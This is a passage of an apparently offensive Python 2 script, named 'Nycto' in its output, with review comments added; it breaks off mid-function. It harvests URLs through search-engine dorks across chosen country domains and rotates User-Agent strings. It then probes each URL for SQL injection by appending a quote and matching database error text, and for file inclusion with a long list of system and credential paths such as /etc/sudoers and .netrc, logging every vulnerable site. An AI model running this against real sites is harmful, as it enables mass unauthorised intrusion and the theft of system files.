| "/.profile", 684 | "/.bashrc", 685 | "/.logout", 686 | "/.Xauthority", 687 | "/.netrc", 688 | "/.forward", 689 | "/.cshrc", 690 | "/etc/default/passwd", 691 | "/etc/syslog.conf", 692 | "/etc/syslogd.conf", 693 | "/etc/release", 694 | "/etc/issue", 695 | "/etc/motd", 696 | "/etc/group", 697 | "/etc/fstab", 698 | "/etc/nsswitch.conf", 699 | "/etc/vfstab", 700 | "/etc/system", 701 | "/var/log/syslog", 702 | "/etc/netconfig", 703 | "/var/log/authlog", 704 | "/log/miscDir/accesslog", 705 | "/etc/sudoers", 706 | "/etc/updatedb.conf", 707 | "/etc/httpd/conf.d/ssl.conf", 708 | "/etc/httpd/conf.d/php.conf", 709 | "/etc/httpd/conf.d/squirrelmail.conf", 710 | "/var/log/httpd/error_log", 711 | "/var/log/httpd/access_log", 712 | "/var/log/apache/error_log", 713 | "/var/log/apache/access_log", 714 | "/var/log/apache2/error_log", 715 | "/var/log/apache2/access_log", 716 | "/etc/logrotate.d/httpd", 717 | "/var/run/httpd.pid", 
718 | "/proc/cpuinfo", 719 | "/proc/version", 720 | "/etc/php.ini", 721 | "/etc/php.d/dom.ini", 722 | "/etc/php.d/gd.ini", 723 | "/etc/php.d/imap.ini", 724 | "/etc/php.d/json.ini", 725 | "/etc/php.d/ldap.ini", 726 | "/etc/php.d/mbstring.ini", 727 | "/etc/php.d/mysql.ini", 728 | "/etc/php.d/mysqli.ini", 729 | "/etc/php.d/odbc.ini", 730 | "/etc/php.d/pdo.ini", 731 | "/etc/php.d/pdo_mysql.ini", 732 | "/etc/php.d/pdo_pgsql.ini", 733 | "/etc/php.d/pdo_sqlite.ini", 734 | "/etc/php.d/pgsql.ini", 735 | "/etc/php.d/xmlreader.ini", 736 | "/etc/php.d/xmlwriter.ini", 737 | "/etc/php.d/xsl.ini", 738 | "/etc/php.d/zip.ini", 739 | "/etc/my.cnf", 740 | "/var/run/mysqld/mysqld.pid", 741 | "/var/log/mysqld.log", 742 | "/var/log/httpd/access.log", 743 | "/var/log/httpd/error.log", 744 | "/var/log/httpd/access_log", 745 | "/var/log/httpd/error_log", 746 | "/apache/logs/error_log", 747 | "/apache/logs/access_log", 748 | "/apache/logs/error.log", 749 | "/apache/logs/access.log", 750 | "/logs/error_log", 751 | "/logs/access_log", 752 | "/logs/error.log", 753 | "/logs/access.log", 754 | "/etc/httpd/logs/access_log", 755 | "/etc/httpd/logs/access.log", 756 | "/etc/httpd/logs/error_log", 757 | "/etc/httpd/logs/error.log", 758 | "/usr/local/apache/logs/access_log", 759 | "/usr/local/apache/logs/access.log", 760 | "/usr/local/apache/logs/error_log", 761 | "/usr/local/apache/logs/error.log", 762 | "/var/log/apache/access_log", 763 | "/var/log/apache/access.log", 764 | "/var/log/apache/error_log", 765 | "/var/log/apache/error.log", 766 | "/var/www/logs/access_log", 767 | "/var/www/logs/access.log", 768 | "/var/www/logs/error_log", 769 | "/var/www/logs/error.log", 770 | "/var/log/access_log", 771 | "/var/log/error_log", 772 | "/var/log/access.log", 773 | "/var/log/error.log", 774 | "/usr/local/apache2/logs/access_log", 775 | "/usr/local/apache2/logs/access.log", 776 | "/usr/local/apache2/logs/error_log", 777 | "/usr/local/apache2/logs/error.log", 778 | "/var/log/apache2/access_log", 779 | 
"/var/log/apache2/access.log",
"/var/log/apache2/error_log",
"/var/log/apache2/error.log",
"/apache2/logs/error_log",
"/apache2/logs/access_log",
"/apache2/logs/error.log",
"/apache2/logs/access.log",
"/var/lib/mlocate/mlocate.db",
"/proc/meminfo",
"/proc/net/route",
"/proc/net/tcp",
"/proc/net/arp",
"/proc/net/dev",
"/proc/partitions",
"/proc/mounts",
"/proc/loadavg",
"/boot/grub/grub.conf",
"/etc/mailman/mm_cfg.py",
"/etc/postfix/mydomains"]

# Response signatures read by ClassicINJ(): label -> pattern handed to
# re.search() against the fetched page body. Every value is a fragment of a
# verbose database, driver or runtime error message, so a match means the page
# echoed raw error text back to the client. Generic error pages and
# parameterized queries are what keep these strings out of responses.
# NOTE(review): the values are compiled as regular expressions, so "()" and "."
# are metacharacters ('GetArray()' matches plain "GetArray"). Broad entries
# such as 'Not found', 'Server Error' and 'Syntax error' also occur on ordinary
# error pages; a hit is an unverified indicator, not a confirmed finding.
sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format',
             'Not found' : 'Not found'}


# Pool of User-Agent strings; search() picks one at random for each search
# request. ClassicINJ() and ClassicLFI() below call urllib2.urlopen() directly
# and do not set a User-Agent from this list.
header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
          'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
          'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
          'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
          'Microsoft Internet Explorer/4.0b1 (Windows 95)',
          'Opera/8.00 (Windows NT 5.1; U; en)',
          'amaya/9.51 libwww/5.4.0',
          'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
          'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
          'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
          'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
          'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
          'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]',
          'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' ]


# Menu label -> list of top-level domains. search() appends each selected
# entry to the query as "+site:<entry>". 'Choose specific domain' holds a
# single empty placeholder that the prompt code below overwrites in place.
domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
           'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
           'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
           'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
           'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
           'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
           'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
           'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
           'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
           'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
           'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
           'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
           'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
           'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
           'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
           'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
           'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
           'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
           'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
           'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
           'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
           'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
           'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
           'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
           'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
           'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
           'name', 'aero', 'xxx','asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
           'pro', 'travel'],'Default':['com','fr','net','edu','gov','info'],'Choose specific domain':[''],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
           'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
           'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
           'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}


# Print a numbered menu of the domain groups; the numbers follow the order in
# which the dict is iterated.
stecnt = 0
for k,v in domains.items():
    stecnt += 1
    print str(stecnt)+" - "+k
sitekey = raw_input("\nChoose your target (if you don't know choose default) : ")

# NOTE(review): "5" is assumed to be the menu number of 'Choose specific
# domain'; a plain Python 2 dict gives no ordering guarantee, so confirm that
# the printed menu and this literal agree. int(sitekey) raises ValueError on
# non-numeric input and nothing here catches it.
if sitekey == "5":
    sitedomain = raw_input("\nChoose the specifics domain (e.g. fr or com...) for multiples domains separe with commas : ")
    if "," in sitedomain:
        # Several domains were typed: use the split list as the selection.
        site = sitedomain.split(',')
        sitearray = site
    else:
        # A single domain was typed: reuse the selected list and overwrite its
        # first element, which mutates the list stored in `domains`.
        sitearray = domains[domains.keys()[int(sitekey)-1]]
        sitearray[0] = sitedomain
else :
    sitearray = domains[domains.keys()[int(sitekey)-1]]


# All three answers stay strings; later code converts them with int() where a
# number is needed.
inurl = raw_input('\nEnter your dork (without "inurl") : ')
numthreads = raw_input('Enter no. of threads : ')
maxc = raw_input('Enter no. of pages : ')
print "\nNumber of SQL errors :",len(sqlerrors)
print "Number of LFI paths :",len(lfis)
print "Number of headers :",len(header)
# NOTE(review): `v` is the variable left over from the menu loop above, so this
# prints the size of the last group iterated, not the size of `sitearray`.
print "Number of domains :",len(v)
print "domains :",sitearray
print "Number of threads :",numthreads
print "Number of pages :",maxc
# `timeout` is not assigned in this part of the file.
print "Timeout in seconds :",timeout
print ""




def search(inurl, maxc):
    """Collect candidate URLs from a web search engine for each selected domain.

    For every entry of the global ``sitearray`` this requests up to
    ``int(maxc)`` result pages for the query ``inurl + "+site:" + entry``,
    extracts every ``href="..."`` value and keeps the ones that pass the two
    filters below. Afterwards it keeps at most one URL per host, and only URLs
    containing "=", appends them to ``finallist`` and returns that list.

    ``finallist`` is not created in this function; it is a name from outside
    this part of the file.
    """
    urls = []
    for site in sitearray:
        site = site.strip()
        page = 0
        try:
            while page < int(maxc):
                # A new cookie jar is created for every page request.
                jar = cookielib.FileCookieJar("cookies")
                query = inurl+"+site:"+site
                results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
                request_web =urllib2.Request(results_web)
                agent = random.choice(header)
                request_web.add_header('User-Agent', agent)
                opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                text = opener_web.open(request_web).read()
                # Captures the value of every href="..." attribute in the page.
                stringreg = re.compile('(?<=href=")(.*?)(?=")')
                names = stringreg.findall(text)
                page += 1
                for name in names:
                    if name not in urls:
                        # Filter 1: drop links containing "(" or "<", links that
                        # start with "/", and "http://" followed by a digit.
                        if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                            pass
                        # Filter 2: drop links naming search engines or the listed
                        # forums, and any link containing "%".
                        elif re.search("google", name) or re.search("duckduckgo", name) or re.search("ixquick", name) or re.search("webcrawler", name) or re.search("dogpile", name) or re.search("yippy", name) or re.search("Bing", name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack", name) or re.search("phpbuilder", name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("br.search.yahoo", name) or re.search("ajax.googleapis", name) or re.search("search.lycos", name) or re.search("gigablast", name) or re.search("web.search.naver", name) or re.search("dmoz", name) or re.search("%", name):
                            pass
                        else:
                            urls.append(name)
                # Progress line, rewritten in place through the leading "\r".
                percent = int((1.0*page/int(maxc))*100)
                urls_len = len(urls)
                sys.stdout.write("\rSite: %s | Nycto Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
                sys.stdout.flush()
        except(KeyboardInterrupt):
            # Ctrl-C stops paging for this entry; the loop moves on to the next.
            pass
    tmplist = []
    print "\n\n[+] URLS (unsorted): ",len(urls)
    for url in urls:
        try:
            # For "scheme://host/path" the third element of the split is the host.
            host = url.split("/",3)
            domain = host[2]
            # Keep one URL per host, and only URLs that carry a "=".
            if domain not in tmplist and "=" in url:
                finallist.append(url)
                tmplist.append(domain)

        except:
            # Bare except: a URL that does not split into three parts is
            # skipped silently, as is any other error raised in the block.
            pass
    print "[+] URLS (sorted) : ",len(finallist)
    return finallist


class injThread(threading.Thread):
    """Worker thread that passes each URL in ``hosts`` to ClassicINJ()."""

    def __init__(self,hosts):
        self.hosts=hosts
        self.fcount = 0
        # Cleared by stop(); run() checks it before every URL.
        self.check = True
        threading.Thread.__init__(self)

    def run (self):
        urls = list(self.hosts)
        for url in urls:
            try:
                if self.check == True:
                    ClassicINJ(url)
                else:
                    break
            except(KeyboardInterrupt,ValueError):
                pass
        # NOTE(review): this listing has lost its indentation; the increment is
        # placed after the loop here - confirm against the original file.
        self.fcount+=1

    def stop(self):
        self.check = False

class lfiThread(threading.Thread):
    """Worker thread that passes each URL in ``hosts`` to ClassicLFI()."""

    def __init__(self,hosts):
        self.hosts=hosts
        self.fcount = 0
        # Cleared by stop(); run() checks it before every URL.
        self.check = True
        threading.Thread.__init__(self)

    def run (self):
        urls = list(self.hosts)
        for url in urls:
            try:
                if self.check == True:
                    ClassicLFI(url)
                else:
                    break
            except(KeyboardInterrupt,ValueError):
                pass
        # NOTE(review): this listing has lost its indentation; the increment is
        # placed after the loop here - confirm against the original file.
        self.fcount+=1

    def stop(self):
        self.check = False


def ClassicINJ(url):
    """Request ``url`` with a single quote appended and scan the reply.

    The response body is searched for every pattern in ``sqlerrors``; each
    matching pattern prints the URL, writes it to ``logfile`` and appends it to
    ``vuln``. Both names, and the G/O/R prefixes used in the print, come from
    outside this part of the file.
    """
    EXT = "'"
    host = url+EXT
    try:
        source = urllib2.urlopen(host).read()
        # NOTE(review): `type` shadows the builtin inside this function. There
        # is no break, so a body matching several patterns is logged once per
        # matching pattern.
        for type,eMSG in sqlerrors.items():
            if re.search(eMSG, source):
                print G+"\n [+] FOUND URL:", O+host, R+"Error:", type
                logfile.write("\n"+host)
                vuln.append(host)


            else:
                pass
    except:
        # Bare except: network failures and every other error are swallowed,
        # so a URL that could not be fetched is indistinguishable from one
        # whose reply matched nothing.
        pass


def ClassicLFI(url):
    """Replace the last parameter value of ``url`` with each path in ``lfis``.

    Everything after the final "=" is dropped and each entry of ``lfis`` is
    appended in turn. A reply containing "root:x" is printed, written to
    ``lfi_log_file`` and appended to ``vuln``, and the loop stops for this URL.
    ``lfi_log_file``, ``vuln`` and the G/O prefixes come from outside this part
    of the file.

    Server side, these requests show up in access logs as a query value holding
    an absolute system path; restricting include and file parameters to an
    allow-list of expected names is what stops the read.
    """
    # rsplit removes the final "=", so it is put back before a path is appended.
    lfiurl = url.rsplit('=', 1)[0]
    if lfiurl[-1] != "=":
        lfiurl = lfiurl + "="
    for lfi in lfis:
        try:
            check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
            # "root:x" is the only marker tested, whichever path was requested.
            if re.findall("root:x", check):
                print G+"\n [+] FOUND-URL: ", O+lfiurl+lfi
                lfi_log_file.write("\n"+lfiurl+lfi)
                vuln.append(lfiurl+lfi)
                break
        except:
            # Bare except: a failed request is skipped and the next path tried.
            pass

def injtest():
    print G+"\n[+] Nycto is scanning sqli ..."
    print "[+] Can take a while ..."
    print "[!] Working ..."
    i = len(usearch) / int(numthreads)
    m = len(usearch) % int(numthreads)
    z = 0
    if len(threads) <= numthreads:
        for x in range(0, int(numthreads)):
            sliced = usearch[x*i:(x+1)*i]
            if (z